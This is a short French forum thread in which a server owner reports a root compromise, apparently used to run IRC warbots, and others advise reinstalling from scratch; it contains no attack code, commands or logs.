c'est pénible
je pense; sans en être sur qu'il s'agissait de faire tourner des bots irc, au vu des sources qu'ils avaient téléchargés.
Bah des warbots et/ou bouncer :) Ca permet de lancer des attaques depuis ton serveur.
J'ai vérifié immédiatement sur dshield, apparament je suis clair, mais cela ne veut rien dire
La franchement, il semble qu'il y ai eu compromission root, si tu as des solides connaissances de ton systeme, tu peux partir a la recherche de la backdoor (s'il n'y en a qu'une) mais c'est un travail long et laborieux que je ne saurais te recommander. Reinstalle from scratch...
Yeah, comme sous windows !!!
en cours, merci de vos infos.
PS: tout cela m'accélère la dernière étape du transit intestinal
HelloMan
suite au blème exposé, je vous transmets certains des logs snort correspondants à l'exploit de Dimanche
en effet, je laisse pas passer, cela pourra peut etre aider qqun @+